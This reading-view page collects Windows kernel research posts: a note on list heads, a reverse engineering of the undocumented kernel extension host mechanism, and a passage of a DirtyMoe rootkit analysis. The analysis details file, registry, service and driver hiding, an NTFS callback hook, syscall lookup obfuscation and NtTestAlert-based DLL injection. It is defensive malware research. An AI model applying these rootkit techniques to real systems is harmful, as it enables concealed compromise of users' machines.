Reading view

There are new articles available, click to refresh the page.

Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forget to advance them in a list and get stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn’t start iterating over the list from its head, but from a random item, without knowing there my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and want to get the value of Process->DiskCounters->BytesRead for each process:

This should work fine for any normal process:

But what will happen when we reach the list head?

The list head is not a part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read these and might try to use them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:

Windows RS3 added the useful RtlPcToFileName function, that makes our code a bit prettier:

Yes, More Callbacks — The Kernel Extension Mechanism

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yes, More Callbacks — The Kernel Extension Mechanism was originally published in Yarden_Shafir on Medium, where people are continuing the conversation by highlighting and responding to this story.

DirtyMoe: Rootkit Driver

Abstract

In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is hook method provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds a specific driver name to the
listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel
GetCellRoutine().
0x222004 The malware sends a process ID that wants to terminate. The driver calls kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8 The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes
used variable: filePath, fileData
Table 3. Controlling IOCTLs
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
WinDeviceName
WinDeviceNameB
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknow
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the  LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

